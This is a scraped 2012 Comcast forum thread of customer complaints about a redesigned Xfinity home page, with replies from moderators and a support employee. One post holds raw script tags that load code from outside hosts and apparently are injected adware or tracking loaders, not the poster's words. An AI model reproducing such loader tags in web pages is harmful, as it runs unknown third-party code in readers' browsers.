New Visitor
br549now

Re: 9/26/12: new home page feedback

New page why so big? Lost stock ticker for quick glance at market don't want to change pages or open somthing else. Today now have lost local temp outside but still knows where I am. Reduce the size of the objects and add some of the things back that were on the old page. This one not so good hope you guys listen other wise moving on.

New Visitor

add the date to the new home page

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
New Visitor
philwc

Stock Quote

Please place current Dow Jones 30 stock quote back on home page

New Visitor
Muggydoo

I HATE THE NEW HOME PAGE!!!!!

I NEVER HAD ANY PROBLEM BRINGING MY EMAIL UP ON THE OLD PAGE, BUT EVERYTIME I TRY TO GET IT UP ON THE NEW ONE, IT WON'T COME UP.  EVEN WHEN THE NEW PAGE WAS COMING UP EVERY NOW AND THEN, WHEN IT CAME UP, I COULDN'T GET MY EMAIL TO COME UP.  I CAN BRING UP THE FIRST EMAIL PAGE, BUT WHEN I CLICK ON "VIEW ALL", MY EMAIL WON'T COME UP.  IF  YOU DON'T DO SOMETHING IMMEDIATELY, I INTEND TO CLOSE OUT MY ACCOUNT. I'VE ALREADY CLOSED MY CABLE TV BECAUSE OF YOUR LOUSY EMPLOYEES IN SHIPPENSBURG, PA.  THERE ARE A LOT OF INTERNET COMPANIES OUT THERE.  SHAPE UP, OR YOU WILL LOSE MANY CUSTOMERS.  WE DON'T HAVE THE TIME AND PATIENCE TO TOLERATE THIS (EXCUSE ME, THIS LITTLE PROBLEM)  WHEN WE PAY SO MUCH.  Z. JACOBS  

New Visitor
LanceKronzer

Stock market report

What happened to the current stock market results.  I never agreed to having you omit them when you came up with this horrible web page.

Visitor

I HATE the new website and am switching my homepage to something else!!  I am forced to look at scads of STUFF that I have no interest in--and cannot reprogram the site to what I feel is of interest to me.

Email Expert
CCCarole

Re: Stock market report

Click on Finance

Finance.JPG

Need Email Help? Please post the following information in your post.
Do you use XfinityConnect? The Full or Lite version?
Do you use an email client? Which one? (Eg; Windows Live mail, Outlook, a smartphone etc.)
Which browser/version do you use? And- have you cleared your browser cache?
Which operating system? XP, Vista, Windows 7, Mac OS X
Details of the problem you are having.

Visitor

Re: New home page is horrible. Can I have the old one back ?

Gave Comcast a chance--it STINKS!!  Have removed Xfinity as my home page on 2 computers.  The new page is just a LOUD mess of ads, TV/ONLINE channels I have NO interest in.  Email me when you fix this problem--this is definitely a BIG MISTAKE on Comcast's part.

New Visitor
andreapete

Re: I HATE THE NEW HOME PAGE!!!!!

I am having the same issue.  How can you  fix it?  It won't do any good to e-mail me because I can't access my e-mail.

Regular Visitor

Re: New home page is horrible. Can I have the old one back ?

I have no problem with the change and I really don't care as long as I am able to do what I need to do.  Ever since you changed the homepage, last week, I think when mine changed, I have had so much trouble accessing links and my email.  The only way I am able to get to my email is by clicking sign in, then it takes me back to homepage, then I either have to click on my profile or help to get to that page then scroll down the bottom of the page to click on email.  When I finally do get to my email, I can only read them.  I can't access the links in my email either.  For example, Crazy Coupon Lady, I get email from them, but I can't open their links.  I get coupon in my emails, can't print them out because I can't open the link.  There are other links in the homepage I can't access.  Even in the help page or security page.  So, is it possible that your new homepage maybe the cause?  Did your new homepage have virus, malware, adware that causing all these problems?  Otherwise, I have to pay a lot of money to get my computer fix.

Regular Contributor

[ Edited ]

What I do not like is everything is huge to the point I feel like I am using 800x600 resolution.

This is at 1920x1080.

http://i45.tinypic.com/9jhyt5.jpg

New Visitor

I do not like the new home page at all.

A customizable page is a much better option.

Weather, local news, national news-that's all I want.

If I want to look at the useless stuff, make me search for that, not the stuff that's actually relavent to my everyday life.

Please try to find a format that works for the everyday person, a page that is easy to look at and browse would be nice..

New Visitor
krazy81941

xfinity new home page

The new page is cluttered and is very much like AOL/Huffington Post page.  I cannot believe how poorly designed it is.  There is no apparent logic to what is featured nor any organization of how to present the material.  Rethink this disaster!!

New Visitor
lanrite

Your New Homepage

I, too, HATE the new page.  I do NOT want to watch TV or movies on my computer, so PLEASE remove the right hand column, or have an option that it can be closed.  My eyesight requires more than a two inch column to read the news, for goodness sake.  This page is HORRIBLE.  Not everyone wants the latest technology.

I suppose, if you INSIST on having all the latest technology available to me on my computer, I COULD cancel my bundle and drop cable TV and my landline and ONLY have your computer cable service.  NOW THAT'S A GOOD THOUGHT!!!!

New Visitor
stonefly_42

I agree with pretty much everyone else on this.  It is busy and where is the stock market report.  Also I have seen these pop up on the home page for over a week now:  Famous Child Stars-Then and Now; TV's Most Fashionable Shows under the TV shows section; 8 Ways to Spot a Liar, etc.  Enough already!  Please go back to the old format.  If things don't get better, I'm off to Firefox.

Regular Visitor

Re: new layout

I am so over comcast I will be looking for an alternative in everything.

Visitor

I agree with all who said the new page is terrible, give the user the option to use the old page. Time to go to Google.

New Visitor
drbttb

Yes, where is the date? The information is almost all about entertainment, it's too big and there's not a date on the whole page.

Horrible change. Please change it back.

New Visitor
judy7632

Features section of home pate

How long is the "Features" area of the home page going to stay the same?  It has had the same nonsense on for a few weeks now>

New Visitor
hmmm1

New Home Page

The new home page is horrible.  Everything is too large and spread out.  I don't care to have to keep scrolling up and down the page to find stuff.  Would rather have the home page from years ago when I first got Comcast services.

Visitor
slkboom

New Homepage

Why am I still getting the old homepage and the new one?? When the homepage comes up it's the old one. Then I check my e-mails and then go back to the homepage, I get the new one..

New Visitor
stonefly_42

Re: Your New Homepage

Right on, ianrite!  Your solution to the problem is a greata idea!  The only thing I like about Comcast is the phone service, but that could very easily be replaced as well. 

Frequent Visitor

New home page

I do not like the new home page.  I can't customize, to have only those items I want.  Where's the local news/connection?  I really want that back!!!!!!!!!!!!!!!!!

Email Expert
CCCarole

Re: New home page

You can find Local news two different ways on the homepage:  1- Hover over the Weather/Sign in area and a link comes up for local news.  OR-2-  click on Local news on the toolbar below Top Videos.local 1.JPG

PS You could not customize the previous homepage either.

Do you use an email client? Which one? (Eg; Windows Live mail, Outlook, a smartphone etc.)

New Visitor

Don't like it at all! I am thinking of changing my home page to yahoo or msn!

New Visitor
obrien205

worthless stupid front , home page news

your front page is terrible, you are posting information that my dog would not be interested in

New Visitor

home page

new home page does not contain weather.  this topic is very useful to me.

Contributor

The old page was lacking as well, due to lack of customizable features.  Now with the new extra bold format, lack of cusomization is more apparent then before.

These comcast forum helpers are really arrogant.  The last setup was missing user friendly features, and that's supposedly a worthy argument for why this entirely different webpage which is less user friendly, actually does not need any additional user friendly features as well?  Comcast seems more interested in pleasing themselves than the customers.

Regular Contributor
swingingby

I am changing to Yahoo as my home page, since they allow customizing!!  Love it.... and it's user friendly.

How do I forward my email and address book to Yahoo from Comcast?  I have Windows XP with Firefox.

Thanks

Official Employee
ComcastJoe

Re: home page

cmassini wrote:

Our team is looking into this now. I will update you when we have more information to pass along.

Sorry for the inconvenience,
Joe
XfinityTV.com/Xfinity.com Support
Twitter: @XfinityTVJoe

Contributor

ComcastJoe wrote:

cmassini wrote:

Our team is looking into this now. I will update you when we have more information to pass along.

Sorry for the inconvenience,
Joe
XfinityTV.com/Xfinity.com Support
Twitter: @XfinityTVJoe

Out of all of the posts in this thread, you answer this one, adding even more to the page (although, this is sonething useful)?  *shakes head.

Email Expert
CCCarole

Do you mean the local weather?  If you click ont e temperature above the Sign in, it brings up local weather.

weather.JPG

Visitor

new homepage unsatisfactory

Featured videos are often no longer available.  Weather is gone.  News items flash by but often can't open for more info.  Poor job.

New Visitor
Liz_S

I hate the new home page, can't find the local news for my area anymore.  When I click on the local button I only get the weather.  Wish you would put back the old page, guess I can always you other site as my homepage, since they didn't change.

New Visitor
klausp

Your previous web page was much better. Size, layout, content, navigation etc.

New Visitor
zippygiggle

Re: web page

I agree that the "old" way was much better!

New Visitor
Somtiga

The new home page reminds me of the check out line at the supermarket with all the scandal sheets. The  misleading headlines, stuff about "celebrities", and stuff probably made up. Important news or items of interest to non-reality show junkies seem to be lacking or at least well diguised. In the supermarket its fun, because your waiting anyway. Here it's something to pass through quickly to get to something I'm interested in.

New Visitor
jds857

Home page

What happen to the wheather on the home page ?

New Visitor
mindrules

Very unhappy.....New homepage does not have local weather displayed, and local news is not updated  with weather or news,  Additionally videos cannot be accessed on a consistant basis.  Very Poor Rating on Services and homepage!!

New Visitor
citizena

There is no date on the home page.

Why is there no date on my home page ?

New Visitor
traute480

Where on the new page is today's date?

Bronze Problem Solver

Re: Question

Apparently, that's another casualty of the downgrade of the page. 

Visitor

Please do something about the ads!!

My security center blocked four Trojan's from this new home page due to an ad that automatically started playing. If this happens again I’ll have no choice but to change my home page as I will not have my computer compromised due to an insecure ad. At least give us the option to “skip this ad” before it starts to play.

The “roll over ad to play” is annoying as well as there are so many it’s impossible not to accidentally roll over one.

Visitor

This by far your WORST revision of the comcast/xfinity home page.  A few changes back we had a page that was easy to customize.  I was able to put items of personal interest upfront.   Unfortunately, you have taken that option away. 

Why do you insist on changing things that work

New Visitor
Amandamay61

new home page

I am starting to really dislike the new web home page.    I go to my emails and it opens to the email preview and it is always blank,so then I have to open another page just to get my emails.  Use to be able to see my emails on the tool bar but now anymore.   And what happen to the weather link?   I am not a fan of goggles home page but it is looking better all the time.

Visitor

If someone has said this already. I second and third it or whatever it's up to now. I would really appreciate the option to choose to go back to the previous style of homepage that we all had before. If that is not possible please like MSN (which gives you options to set up your homepage) give us an option to create our homepage like the old one with some of the new items that were added so we can make those choices for our selves. That is all I wanted to put out there. I hope the comcast team of designers are listening to all the input, feedback.

Thanks a really concerned customer.

I like my news and 10 things to know for in the main section. If things don't change. I will make MSN my

homepage.

New Visitor
LMCOLE1972

The new homepage is not very friendly old one was much easier please replace or let let us know how to get back I would NEVER have  hit new home page if I had knew . PLEASE HELP MANY OF US

New Visitor
Carolyn7041

Format of the current comcast.net set

I truly dislike the new format of the comcast.net home page. It's hard to find the latest news and stocks etc - instead every bit of useless information comes up on the front page. I liked the previous format as everything important was put on the homepage and I could get it at a glance.

New Visitor
Carolyn7041

Absolutely hate the new format - bring the old one back - why was it changed ?? Too much useless information...absolutely agree with the many feedbacks posted.

New Visitor

Home page for Infinity

On the home page for Infinity, there is not one place (like there used to be) to pick "news".  What you show us is "junk"..........entertainment junk and frivious stuff.  With what is going on in the news, the least you could do is be serious about the front page and offer us things that are most important.  I am not interested in George Clooney and Hollywood and who is getting married and divored in Hollywood.   Can we just get a little more serious.  It is like offering us "Days of our Lives....................".  Soap Operas!!!!